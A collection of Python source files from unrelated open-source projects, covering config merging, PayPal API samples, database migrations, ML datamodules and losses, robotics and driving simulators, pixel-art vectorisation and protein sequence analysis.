conflict_filename = os.path.join(ConfigMerge.OUTPUT_DIR, "file-diff.txt")
logger.warn(
"You have file diff conflicts. Please check {0}".format(conflict_filename))
with open(conflict_filename, "w") as fp:
fp.write(configuration_diff_output)
logger.info("Script successfully finished")
return 0
@staticmethod
def format_diff_output(file_conflicts, configurations_conflicts, attributes_conflicts):
output = ""
if file_conflicts:
output += "======= File diff conflicts ====== \n\n"
for file_conflict in file_conflicts:
output+=str(file_conflict)+"\n"
if configurations_conflicts:
output += "\n\n======= Property diff conflicts ====== "
for config_name, property in configurations_conflicts.iteritems():
if property:
output+= "\n\n||| " + config_name + " |||\n"
output+= "\n".join(str(p) for p in property)
if attributes_conflicts:
output += "\n\n======= Final attribute diff conflicts ====== "
for config_name, property_with_attribute in attributes_conflicts.iteritems():
if property_with_attribute:
output+= "\n\n||| " + config_name + " |||\n"
output+= "\n".join(str(p) for p in property_with_attribute)
return output
@staticmethod
def configuration_diff(left, right):
properties_conflicts = []
attributes_conflicts = []
left_path, left_parser = left[0]
left_configurations, left_attributes = left_parser.read_data_to_map(left_path)
right_path, right_parser = right[0]
right_configurations, right_attributes = right_parser.read_data_to_map(right_path)
matches_configs = []
matches_attributes = []
matches_configs, properties_conflicts = ConfigMerge.get_conflicts_and_matches(left_configurations, right_configurations, left_path, right_path)
properties_conflicts += ConfigMerge.get_missing_properties(left_configurations, matches_configs, right_path) + \
ConfigMerge.get_missing_properties(right_configurations, matches_configs, left_path)
if left_attributes and right_attributes:
matches_attributes, attributes_conflicts = ConfigMerge.get_conflicts_and_matches(left_attributes, right_attributes, left_path, right_path)
attributes_conflicts += ConfigMerge.get_missing_attributes(left_attributes, matches_attributes, right_path) + \
ConfigMerge.get_missing_attributes(right_attributes, matches_attributes, left_path)
elif left_attributes:
attributes_conflicts = ConfigMerge.get_missing_attributes(left_attributes, matches_attributes, right_path)
elif right_attributes:
attributes_conflicts = ConfigMerge.get_missing_attributes(right_attributes, matches_attributes, left_path)
return properties_conflicts, attributes_conflicts
@staticmethod
def get_conflicts_and_matches(left_items, right_items, left_path, right_path):
matches = []
conflicts = []
for left_key, left_value in left_items.iteritems():
for right_key, right_value in right_items.iteritems():
if left_key == right_key:
matches.append(right_key)
if left_value != right_value:
conflicts.append({right_key : [{left_path : left_value}, {right_path :right_value}]})
return matches, conflicts
@staticmethod
def get_missing_attributes(attributes, matches, file_path):
conflicts = []
for key, value in attributes.iteritems():
if not key in matches:
conflicts.append({key : "Final attribute is missing in {0} file".format(file_path)})
return conflicts
@staticmethod
def get_missing_properties(configurations, matches, file_path):
conflicts = []
for key, value in configurations.iteritems():
if not key in matches:
conflicts.append({key : "Property is missing in {0} file".format(file_path)})
return conflicts
@staticmethod
def get_missing_files(config_file_paths, matches, input_dir):
conflicts = []
for file_name in config_file_paths:
if file_name not in matches:
conflicts.append({file_name : "Configurations file is missing for {0} directory".format(input_dir)})
return conflicts
def main():
tempDir = tempfile.gettempdir()
outputDir = os.path.join(tempDir)
parser = optparse.OptionParser(usage="usage: %prog [options]")
parser.set_description('This python program is an Ambari thin client and '
'supports Ambari cluster takeover by generating a '
'configuration json that can be used with a '
'blueprint.\n\nIt reads actual hadoop configs '
'from a target directory and produces an out file '
'with problems found that need to be addressed and '
'the json file which can be used to create the '
'blueprint.\n\nThis script only works with *.xml *.yaml '
'and *.properties extensions of files.')
parser.add_option("-a", "--action", dest="action", default = "merge",
help="Script action. (merge/diff) [default: merge]")
parser.add_option("-v", "--verbose", dest="verbose", action="store_true",
default=False, help="output verbosity.")
parser.add_option("-o", "--outputdir", dest="outputDir", default=outputDir,
metavar="FILE", help="Output directory. [default: /tmp]")
parser.add_option("-u", '--unknown-files-mapping-file',dest="unknown_files_mapping_file",
metavar="FILE", help=CONFIG_MAPPING_HELP_TEXT, default="takeover_files_mapping.json")
merge_options_group = OptionGroup(parser, "Required options for action 'merge'")
merge_options_group.add_option("-i", "--inputdir", dest="inputDir", help="Input directory.")
parser.add_option_group(merge_options_group)
diff_options_group = OptionGroup(parser, "Required options for action 'diff'")
diff_options_group.add_option("-l", "--leftInputDir", dest="leftInputDir", help="Left input directory.")
diff_options_group.add_option("-r", "--rightInputDir", dest="rightInputDir", help="Right input directory.")
parser.add_option_group(diff_options_group)
(options, args) = parser.parse_args()
# set verbose
if options.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
ConfigMerge.OUTPUT_DIR = options.outputDir
if not os.path.exists(ConfigMerge.OUTPUT_DIR):
os.makedirs(ConfigMerge.OUTPUT_DIR)
logegr_file_name = os.path.join(ConfigMerge.OUTPUT_DIR, "takeover_config_merge.log")
file_handler = logging.FileHandler(logegr_file_name, mode="w")
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.INFO)
stdout_handler.setFormatter(formatter)
logger.addHandler(stdout_handler)
#unknown file mapping
if options.unknown_files_mapping_file and os.path.exists(options.unknown_files_mapping_file):
ConfigMerge.UNKNOWN_FILES_MAPPING_FILE = options.unknown_files_mapping_file
with open(options.unknown_files_mapping_file) as f:
ConfigMerge.CONTENT_UNKNOWN_FILES_MAPPING_FILE = json.load(f)
else:
logger.warning("Config mapping file was not found at {0}. "
"Please provide it at the given path or provide a different path to it using -u option.".format(options.unknown_files_mapping_file))
if options.action == "merge" :
ConfigMerge.INPUT_DIR = options.inputDir
file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.INPUT_DIR)
logger.info("Writing logs into '{0}' file".format(logegr_file_name))
logger.debug("Following configuration files found:\n{0}".format(file_paths.items()))
config_merge = ConfigMerge(config_files_map=file_paths)
return config_merge.perform_merge()
elif options.action == "diff" :
if options.leftInputDir and os.path.isdir(options.leftInputDir):
ConfigMerge.LEFT_INPUT_DIR = options.leftInputDir
else:
logger.error("Directory \"{0}\" doesn't exist. Use option \"-h\" for details".format(options.leftInputDir))
return -1
if options.rightInputDir and os.path.isdir(options.rightInputDir):
ConfigMerge.RIGHT_INPUT_DIR = options.rightInputDir
else:
logger.error("Directory \"{0}\" doesn't exist. Use option \"-h\" for details".format(options.rightInputDir))
return -1
logger.info("Writing logs into '{0}' file".format(logegr_file_name))
left_file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.LEFT_INPUT_DIR)
logger.debug("Following configuration files found:\n{0} for left directory".format(left_file_paths.items()))
right_file_paths = ConfigMerge.get_all_supported_files_grouped_by_name(directory=ConfigMerge.RIGHT_INPUT_DIR)
logger.debug("Following configuration files found:\n{0} for right directory".format(right_file_paths.items()))
config_merge = ConfigMerge(left_file_paths=left_file_paths , right_file_paths=right_file_paths)
return config_merge.perform_diff()
else:
logger.error("Action \"{0}\" doesn't supports by script. Use option \"-h\" for details".format(options.action))
return -1
if __name__ == "__main__":
try:
sys.exit(main())
except (KeyboardInterrupt, EOFError):
print("\nAborting ... Keyboard Interrupt.")
sys.exit(1)
|
samples/payment/all.py | Hey-Marvelous/PayPal-Python-SDK | 653 | 12686633 | <filename>samples/payment/all.py
# GetPaymentList Sample
# This sample code demonstrate how you can
# retrieve a list of all Payment resources
# you've created using the Payments API.
# Note various query parameters that you can
# use to filter, and paginate through the
# payments list.
# API used: GET /v1/payments/payments
from paypalrestsdk import Payment
import logging
logging.basicConfig(level=logging.INFO)
# Retrieve
# Retrieve the PaymentHistory by calling the
# `all` method
# on the Payment class
# Refer the API documentation
# for valid values for keys
# Supported paramters are :count, :next_id
payment_history = Payment.all({"count": 2})
# List Payments
print("List Payment:")
for payment in payment_history.payments:
print(" -> Payment[%s]" % (payment.id))
|
migrations/versions/2e9d99288cd_.py | IsmaelJS/test-github-actions | 1,420 | 12686651 | <gh_stars>1000+
"""empty message
Revision ID: <KEY>
Revises: 36954739c63
Create Date: 2015-11-23 21:16:54.103342
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '3<PASSWORD>4<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('user') as batch_op:
batch_op.alter_column('created',
existing_type=sa.DATETIME(),
nullable=False)
batch_op.alter_column('updated',
existing_type=sa.DATETIME(),
nullable=False)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('user') as batch_op:
batch_op.alter_column('updated',
existing_type=sa.DATETIME(),
nullable=True)
batch_op.alter_column('created',
existing_type=sa.DATETIME(),
nullable=True)
### end Alembic commands ###
|
meter/datamodules/trash/nlvr2_datamodule.py | shinying/METER | 135 | 12686654 | <reponame>shinying/METER
from ..datasets import NLVR2Dataset
from .datamodule_base import BaseDataModule
class NLVR2DataModule(BaseDataModule):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@property
def dataset_cls(self):
return NLVR2Dataset
@property
def dataset_name(self):
return "nlvr2"
|
telemetry/third_party/web-page-replay/rules/rule.py | ravitejavalluri/catapult | 226 | 12686688 | <reponame>ravitejavalluri/catapult
#!/usr/bin/env python
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Rule(object):
"""An optional base class for rule implementations.
The rule_parser looks for the 'IsType' and 'ApplyRule' methods by name, so
rules are not strictly required to extend this class.
"""
def IsType(self, rule_type_name):
"""Returns True if the name matches this rule."""
raise NotImplementedError
def ApplyRule(self, return_value, request, response):
"""Invokes this rule with the given args.
Args:
return_value: the prior rule's return_value (if any).
request: the httparchive ArchivedHttpRequest.
response: the httparchive ArchivedHttpResponse, which may be None.
Returns:
A (should_stop, return_value) tuple. Typically the request and response
are treated as immutable, so it's the caller's job to apply the
return_value (e.g., set response fields).
"""
raise NotImplementedError
|
src/garage/envs/mujoco/half_cheetah_env_meta_base.py | blacksph3re/garage | 1,500 | 12686690 | """Base class of HalfCheetah meta-environments."""
from gym.envs.mujoco import HalfCheetahEnv as HalfCheetahEnv_
import numpy as np
from garage import EnvSpec
class HalfCheetahEnvMetaBase(HalfCheetahEnv_):
"""Base class of HalfCheetah meta-environments.
Code is adapted from
https://github.com/tristandeleu/pytorch-maml-rl/blob/493e677e724aa67a531250b0e215c8dbc9a7364a/maml_rl/envs/mujoco/half_cheetah.py
Which was in turn adapted from
https://github.com/cbfinn/maml_rl/blob/9c8e2ebd741cb0c7b8bf2d040c4caeeb8e06cc95/rllab/envs/mujoco/half_cheetah_env_rand.py
Args:
task (dict): Subclass specific task information.
"""
def __init__(self, task):
self._task = task
super().__init__()
self.spec = EnvSpec(action_space=self.action_space,
observation_space=self.observation_space)
def _get_obs(self):
"""Get a low-dimensional observation of the state.
Returns:
np.ndarray: Contains the flattened angle quaternion, angular
velocity quaternion, and cartesian position.
"""
return np.concatenate([
self.sim.data.qpos.flat[1:],
self.sim.data.qvel.flat,
self.get_body_com('torso').flat,
]).astype(np.float32).flatten()
def viewer_setup(self):
"""Start the viewer."""
camera_id = self.model.camera_name2id('track')
self.viewer.cam.type = 2
self.viewer.cam.fixedcamid = camera_id
self.viewer.cam.distance = self.model.stat.extent * 0.35
# Hide the overlay
# This code was inheritted, so we'll ignore this access violation for
# now.
# pylint: disable=protected-access
self.viewer._hide_overlay = True
def __getstate__(self):
"""See `Object.__getstate__.
Returns:
dict: The instance’s dictionary to be pickled.
"""
return dict(task=self._task)
def __setstate__(self, state):
"""See `Object.__setstate__.
Args:
state (dict): Unpickled state of this object.
"""
self.__init__(task=state['task'])
|
metadrive/component/road_network/edge_road_network.py | liuzuxin/metadrive | 125 | 12686692 | from metadrive.component.road_network.base_road_network import BaseRoadNetwork, LaneIndex
import gc
import copy
import logging
from typing import List, Tuple, Dict
import numpy as np
from metadrive.component.lane.abs_lane import AbstractLane
from metadrive.component.road_network.road import Road
from metadrive.component.road_network.base_road_network import BaseRoadNetwork
from metadrive.constants import Decoration
from metadrive.utils.math_utils import get_boxes_bounding_box
from metadrive.utils.scene_utils import get_lanes_bounding_box
from collections import namedtuple
lane_info = namedtuple("neighbor_lanes", "lane entry_lanes exit_lanes left_lanes right_lanes")
class EdgeRoadNetwork(BaseRoadNetwork):
"""
Compared to NodeRoadNetwork representing the relation of lanes in a node-based graph, EdgeRoadNetwork stores the
relationship in edge-based graph, which is more common in real map representation
"""
def __init__(self):
super(EdgeRoadNetwork, self).__init__()
self.graph = {}
def add_lane(self, lane) -> None:
self.graph[lane.index] = lane_info(
lane=lane,
entry_lanes=lane.entry_lanes,
exit_lanes=lane.exit_lanes,
left_lanes=lane.left_lanes,
right_lanes=lane.right_lanes
)
def get_lane(self, index: LaneIndex):
return self.graph[index].lane
def __isub__(self, other):
for id, lane_info in other.graph.items():
self.graph.pop(id)
return self
def add(self, other, no_intersect=True):
for id, lane_info in other.graph.items():
if no_intersect:
assert id not in self.graph.keys(), "Intersect: {} exists in two network".format(id)
self.graph[id] = other.graph[id]
return self
def _get_bounding_box(self):
"""
By using this bounding box, the edge length of x, y direction and the center of this road network can be
easily calculated.
:return: minimum x value, maximum x value, minimum y value, maximum y value
"""
lanes = []
for id, lane_info, in self.graph.items():
lanes.append(lane_info.lane)
res_x_max, res_x_min, res_y_max, res_y_min = get_boxes_bounding_box([get_lanes_bounding_box(lanes)])
return res_x_min, res_x_max, res_y_min, res_y_max
def shortest_path(self, start: str, goal: str):
return next(self.bfs_paths(start, goal), [])
def bfs_paths(self, start: str, goal: str) -> List[List[str]]:
"""
Breadth-first search of all routes from start to goal.
:param start: starting node
:param goal: goal node
:return: list of paths from start to goal.
"""
queue = [(start, [start])]
while queue:
(node, path) = queue.pop(0)
if node not in self.graph:
yield []
for _next in set(self.graph[node].exit_lanes) - set(path):
if _next == goal:
yield path + [_next]
elif _next in self.graph:
queue.append((_next, path + [_next]))
def get_peer_lanes_from_index(self, lane_index):
info: lane_info = self.graph[lane_index]
ret = [self.graph[lane_index].lane]
for left_n in info.left_lanes:
ret.append(self.graph[left_n["id"]].lane)
for right_n in info.right_lanes:
ret.append(self.graph[right_n["id"]].lane)
return ret
def destroy(self):
super(EdgeRoadNetwork, self).destroy()
for k, v in self.graph.items():
v.lane.destroy()
self.graph[k]: lane_info = None
self.graph = None
def __del__(self):
logging.debug("{} is released".format(self.__class__.__name__))
|
ml3d/torch/modules/losses/semseg_loss.py | krshrimali/Open3D-ML | 346 | 12686699 | import torch
import torch.nn as nn
from ....datasets.utils import DataProcessing
def filter_valid_label(scores, labels, num_classes, ignored_label_inds, device):
"""Loss functions for semantic segmentation."""
valid_scores = scores.reshape(-1, num_classes)
valid_labels = labels.reshape(-1).to(device)
ignored_bool = torch.zeros_like(valid_labels, dtype=torch.bool)
for ign_label in ignored_label_inds:
ignored_bool = torch.logical_or(ignored_bool,
torch.eq(valid_labels, ign_label))
valid_idx = torch.where(torch.logical_not(ignored_bool))[0].to(device)
valid_scores = torch.gather(valid_scores, 0,
valid_idx.unsqueeze(-1).expand(-1, num_classes))
valid_labels = torch.gather(valid_labels, 0, valid_idx)
# Reduce label values in the range of logit shape
reducing_list = torch.arange(0, num_classes, dtype=torch.int64)
inserted_value = torch.zeros([1], dtype=torch.int64)
for ign_label in ignored_label_inds:
if ign_label >= 0:
reducing_list = torch.cat([
reducing_list[:ign_label], inserted_value,
reducing_list[ign_label:]
], 0)
valid_labels = torch.gather(reducing_list.to(device), 0,
valid_labels.long())
return valid_scores, valid_labels
class SemSegLoss(object):
"""Loss functions for semantic segmentation."""
def __init__(self, pipeline, model, dataset, device):
super(SemSegLoss, self).__init__()
# weighted_CrossEntropyLoss
if 'class_weights' in dataset.cfg.keys() and len(
dataset.cfg.class_weights) != 0:
class_wt = DataProcessing.get_class_weights(
dataset.cfg.class_weights)
weights = torch.tensor(class_wt, dtype=torch.float, device=device)
self.weighted_CrossEntropyLoss = nn.CrossEntropyLoss(weight=weights)
else:
self.weighted_CrossEntropyLoss = nn.CrossEntropyLoss()
|
venv/Lib/site-packages/statsmodels/iolib/stata_summary_examples.py | EkremBayar/bayar | 6,931 | 12686708 |
""". regress totemp gnpdefl gnp unemp armed pop year
Source | SS df MS Number of obs = 16
-------------+------------------------------ F( 6, 9) = 330.29
Model | 184172402 6 30695400.3 Prob > F = 0.0000
Residual | 836424.129 9 92936.0144 R-squared = 0.9955
-------------+------------------------------ Adj R-squared = 0.9925
Total | 185008826 15 12333921.7 Root MSE = 304.85
------------------------------------------------------------------------------
totemp | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.863 -177.0291 207.1524
gnp | -.0358191 .033491 -1.07 0.313 -.111581 .0399428
unemp | -2.020229 .4883995 -4.14 0.003 -3.125065 -.9153928
armed | -1.033227 .2142741 -4.82 0.001 -1.517948 -.5485049
pop | -.0511045 .2260731 -0.23 0.826 -.5625173 .4603083
year | 1829.151 455.4785 4.02 0.003 798.7873 2859.515
_cons | -3482258 890420.3 -3.91 0.004 -5496529 -1467987
------------------------------------------------------------------------------
"""
#From Stata using Longley dataset as in the test and example for GLM
"""
. glm totemp gnpdefl gnp unemp armed pop year
Iteration 0: log likelihood = -109.61744
Generalized linear models No. of obs = 16
Optimization : ML Residual df = 9
Scale parameter = 92936.01
Deviance = 836424.1293 (1/df) Deviance = 92936.01
Pearson = 836424.1293 (1/df) Pearson = 92936.01
Variance function: V(u) = 1 [Gaussian]
Link function : g(u) = u [Identity]
AIC = 14.57718
Log likelihood = -109.6174355 BIC = 836399.2
------------------------------------------------------------------------------
| OIM
totemp | Coef. Std. Err. z P>|z| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.859 -151.3684 181.4917
gnp | -.0358191 .033491 -1.07 0.285 -.1014603 .029822
unemp | -2.020229 .4883995 -4.14 0.000 -2.977475 -1.062984
armed | -1.033227 .2142741 -4.82 0.000 -1.453196 -.6132571
pop | -.0511045 .2260731 -0.23 0.821 -.4941996 .3919906
year | 1829.151 455.4785 4.02 0.000 936.4298 2721.873
_cons | -3482258 890420.3 -3.91 0.000 -5227450 -1737066
------------------------------------------------------------------------------
"""
#RLM Example
"""
. rreg stackloss airflow watertemp acidconc
Huber iteration 1: maximum difference in weights = .48402478
Huber iteration 2: maximum difference in weights = .07083248
Huber iteration 3: maximum difference in weights = .03630349
Biweight iteration 4: maximum difference in weights = .2114744
Biweight iteration 5: maximum difference in weights = .04709559
Biweight iteration 6: maximum difference in weights = .01648123
Biweight iteration 7: maximum difference in weights = .01050023
Biweight iteration 8: maximum difference in weights = .0027233
Robust regression Number of obs = 21
F( 3, 17) = 74.15
Prob > F = 0.0000
------------------------------------------------------------------------------
stackloss | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
airflow | .8526511 .1223835 6.97 0.000 .5944446 1.110858
watertemp | .8733594 .3339811 2.61 0.018 .1687209 1.577998
acidconc | -.1224349 .1418364 -0.86 0.400 -.4216836 .1768139
_cons | -41.6703 10.79559 -3.86 0.001 -64.447 -18.89361
------------------------------------------------------------------------------
"""
|
test/integration/samples_in/simple.py | Inveracity/flynt | 487 | 12686746 | var = 5
a = "my string {}".format(var)
|
depixel/io_png.py | sknebel/depixel | 128 | 12686749 | <reponame>sknebel/depixel
import png
from depixel.io_data import PixelDataWriter
class Bitmap(object):
mode = 'RGB'
bgcolour = (127, 127, 127)
def __init__(self, size, bgcolour=None, mode=None):
if bgcolour is not None:
self.bgcolour = bgcolour
if mode is not None:
self.mode = mode
self.size = size
self.pixels = []
for _ in range(self.size[1]):
self.pixels.append([bgcolour] * self.size[0])
def set_pixel(self, x, y, value):
self.pixels[y][x] = value
def pixel(self, x, y):
return self.pixels[y][x]
def set_data(self, data):
assert len(data) == self.size[1]
new_pixels = []
for row in data:
assert len(row) == self.size[0]
new_pixels.append(row[:])
self.pixels = new_pixels
def set_block(self, x, y, data):
assert 0 <= x <= (self.size[0] - len(data[0]))
assert 0 <= y <= (self.size[1] - len(data))
for dy, row in enumerate(data):
for dx, value in enumerate(row):
self.set_pixel(x + dx, y + dy, value)
def flat_pixels(self):
flat_pixels = []
for row in self.pixels:
frow = []
for value in row:
frow.extend(value)
flat_pixels.append(frow)
return flat_pixels
def write_png(self, filename):
png.from_array(self.flat_pixels(), mode=self.mode).save(filename)
def draw_line(self, p0, p1, colour):
"""Bresenham's line algorithm."""
x0, y0 = p0
x1, y1 = p1
dx = abs(x0 - x1)
dy = abs(y0 - y1)
sx = 1 if x0 < x1 else -1
sy = 1 if y0 < y1 else -1
err = dx - dy
while (x0, y0) != (x1, y1):
self.set_pixel(x0, y0, colour)
e2 = 2 * err
if e2 > -dy:
err -= dy
x0 += + sx
if e2 < dx:
err += dx
y0 += sy
self.set_pixel(x1, y1, colour)
def fill(self, point, colour):
old_colour = self.pixels[point[1]][point[0]]
if old_colour == colour:
return
self.fill_scan(point, old_colour, colour)
def fill_pix(self, point, old_colour, colour):
"""
Pixel flood-fill. Reliable, but slow.
"""
to_fill = [point]
while to_fill:
x, y = to_fill.pop()
self.set_pixel(x, y, colour)
for nx, ny in [(x - 1, y), (x + 1, y), (x, y - 1), (x, y + 1)]:
if 0 <= nx < self.size[0] and 0 <= ny < self.size[1]:
if self.pixels[ny][nx] == old_colour:
to_fill.append((nx, ny))
def fill_scan(self, point, old_colour, colour):
"""
Scanline flood-fill. Fast, but I'm not entirely sure what it's doing.
"""
to_fill = [point]
while to_fill:
x, y = to_fill.pop()
while y > 0 and self.pixel(x, y - 1) == old_colour:
y -= 1
lspan = False
rspan = False
while y < self.size[1] and self.pixel(x, y) == old_colour:
self.set_pixel(x, y, colour)
if not lspan and x > 0 and self.pixel(x - 1, y) == old_colour:
to_fill.append((x - 1, y))
lspan = True
elif lspan and x > 0 and self.pixel(x - 1, y) == old_colour:
lspan = False
if (not rspan and x < self.size[0] - 1
and self.pixel(x + 1, y) == old_colour):
to_fill.append((x + 1, y))
rspan = True
elif (rspan and x < self.size[0] - 1
and self.pixel(x + 1, y) == old_colour):
rspan = False
y += 1
class PixelDataPngWriter(PixelDataWriter):
FILE_EXT = 'png'
def translate_pixel(self, pixel):
if not isinstance(pixel, (list, tuple)):
# Assume monochrome values normalised to [0, 1].
return (int(255 * pixel),) * 3
return pixel
def make_drawing(self, drawing_type, _filename):
if drawing_type == 'pixels':
return Bitmap(self.pixel_data.size)
return Bitmap((self.pixel_data.size_x * self.PIXEL_SCALE + 1,
self.pixel_data.size_y * self.PIXEL_SCALE + 1),
bgcolour=(127, 127, 127))
def save_drawing(self, drawing, filename):
drawing.write_png(filename)
def draw_pixel(self, drawing, pt, colour):
drawing.set_pixel(pt[0], pt[1], self.translate_pixel(colour))
def draw_line(self, drawing, pt0, pt1, colour):
drawing.draw_line(pt0, pt1, self.translate_pixel(colour))
def draw_polygon(self, drawing, path, colour, fill):
pt0 = path[-1]
for pt1 in path:
self.draw_line(drawing, pt0, pt1, colour)
pt0 = pt1
middle = (sum([p[0] for p in path]) / len(path),
sum([p[1] for p in path]) / len(path))
drawing.fill(middle, fill)
def draw_path_shape(self, drawing, paths, colour, fill):
for path in paths:
pt0 = path[-1]
for pt1 in path:
self.draw_line(drawing, pt0, pt1, colour)
pt0 = pt1
drawing.fill(self.find_point_within(paths, fill), fill)
def find_point_within(self, paths, colour):
for node, attrs in self.pixel_data.pixel_graph.nodes_iter(data=True):
if colour == attrs['value']:
pt = self.scale_pt(node, (0.5, 0.5))
if self.is_inside(pt, paths):
return pt
def is_inside(self, pt, paths):
if not self._is_inside(pt, paths[0]):
# Must be inside the "outside" path.
return False
for path in paths[1:]:
if self._is_inside(pt, path):
# Must be outside the "inside" paths.
return False
return True
def _is_inside(self, pt, path):
inside = False
x, y = pt
x0, y0 = path[-1]
for x1, y1 in path:
if (y0 <= y < y1 or y1 <= y < y0) and (x0 <= x or x1 <= x):
# This crosses our ray.
if (x1 + float(y - y1) / (y0 - y1) * (x0 - x1)) < x:
inside = not inside
x0, y0 = x1, y1
return inside
def draw_shapes(self, drawing, element=None):
for shape in self.pixel_data.shapes:
paths = [[self.scale_pt(p) for p in path]
for path in shape['paths']]
self.draw_path_shape(
drawing, paths, self.GRID_COLOUR, shape['value'])
def read_png(filename):
_w, _h, pixels, _meta = png.Reader(filename=filename).asRGB8()
data = []
for row in pixels:
d_row = []
while row:
d_row.append((row.pop(0), row.pop(0), row.pop(0)))
data.append(d_row)
return data
|
prody/sequence/analysis.py | kaynakb/ProDy | 210 | 12686770 | <reponame>kaynakb/ProDy
# -*- coding: utf-8 -*-
"""This module defines MSA analysis functions."""
__author__ = '<NAME>, <NAME>, <NAME>'
from numbers import Integral
import os
from numpy import dtype, zeros, empty, ones, where, ceil, shape, eye
from numpy import indices, tril_indices, array, ndarray, isscalar, unique
from prody import LOGGER
from prody.utilities import which, MATCH_SCORE, MISMATCH_SCORE
from prody.utilities import GAP_PENALTY, GAP_EXT_PENALTY, ALIGNMENT_METHOD
from prody.sequence.msa import MSA, refineMSA
from prody.sequence.msafile import parseMSA, writeMSA
from prody.sequence.sequence import Sequence
from prody.atomic import Atomic
from prody.measure import calcDistance
from Bio import pairwise2
import sys
__all__ = ['calcShannonEntropy', 'buildMutinfoMatrix', 'calcMSAOccupancy',
'applyMutinfoCorr', 'applyMutinfoNorm', 'calcRankorder', 'filterRankedPairs',
'buildSeqidMatrix', 'uniqueSequences', 'buildOMESMatrix',
'buildSCAMatrix', 'buildDirectInfoMatrix', 'calcMeff',
'buildPCMatrix', 'buildMSA', 'showAlignment', 'alignTwoSequencesWithBiopython',
'alignSequenceToMSA', 'calcPercentIdentities', 'alignSequencesByChain',
'trimAtomsUsingMSA']
doc_turbo = """
By default, *turbo* mode, which uses memory as large as the MSA array
itself but runs four to five times faster, will be used. If memory
allocation fails, the implementation will fall back to slower and
memory efficient mode."""
def calcPercentIdentities(msa):
percent_ids = []
aas = ['A','C','D','E','F','G','H','I','J','K','L', \
'M','N','P','Q','R','S','T','V','W','Y','-']
for i in range(len(msa)):
col_list = list(msa.getArray()[:,i])
max_count = 0
for aa in aas:
if col_list.count(aa) > max_count:
max_count = col_list.count(aa)
percent_ids.append(float(max_count)/float(len(col_list))*100)
return percent_ids
def getMSA(msa):
"""Returns MSA character array."""
try:
msa = msa._getArray()
except AttributeError:
pass
try:
dtype_, ndim, shape = msa.dtype, msa.ndim, msa.shape
except AttributeError:
raise TypeError('msa must be an MSA instance or a 2D character array')
if dtype_ != dtype('|S1') or ndim != 2:
raise TypeError('msa must be an MSA instance or a 2D character array')
return msa
def calcShannonEntropy(msa, ambiguity=True, omitgaps=True, **kwargs):
"""Returns Shannon entropy array calculated for *msa*, which may be
an :class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types.
All non-alphabet characters are considered as gaps, and they are handled
in two ways:
* non-existent, the probability of observing amino acids in a given
column is adjusted, by default
* as a distinct character with its own probability, when *omitgaps* is
**False**"""
msa = getMSA(msa)
length = msa.shape[1]
entropy = empty(length, float)
from .msatools import msaentropy
return msaentropy(msa, entropy,
ambiguity=bool(ambiguity), omitgaps=bool(omitgaps))
def buildMutinfoMatrix(msa, ambiguity=True, turbo=True, **kwargs):
"""Returns mutual information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps.
Mutual information matrix can be normalized or corrected using
:func:`applyMINormalization` and :func:`applyMICorrection` methods,
respectively. Normalization by joint entropy can performed using this
function with *norm* option set **True**."""
msa = getMSA(msa)
from .msatools import msamutinfo
LOGGER.timeit('_mutinfo')
length = msa.shape[1]
mutinfo = empty((length, length), float)
mutinfo = msamutinfo(msa, mutinfo,
ambiguity=bool(ambiguity), turbo=bool(turbo),
norm=bool(kwargs.get('norm', False)),
debug=bool(kwargs.get('debug', False)))
LOGGER.report('Mutual information matrix was calculated in %.2fs.',
'_mutinfo')
return mutinfo
buildMutinfoMatrix.__doc__ += doc_turbo
def calcMSAOccupancy(msa, occ='res', count=False):
"""Returns occupancy array calculated for residue positions (default,
``'res'`` or ``'col'`` for *occ*) or sequences (``'seq'`` or ``'row'``
for *occ*) of *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. By default, occupancy [0-1] will be calculated.
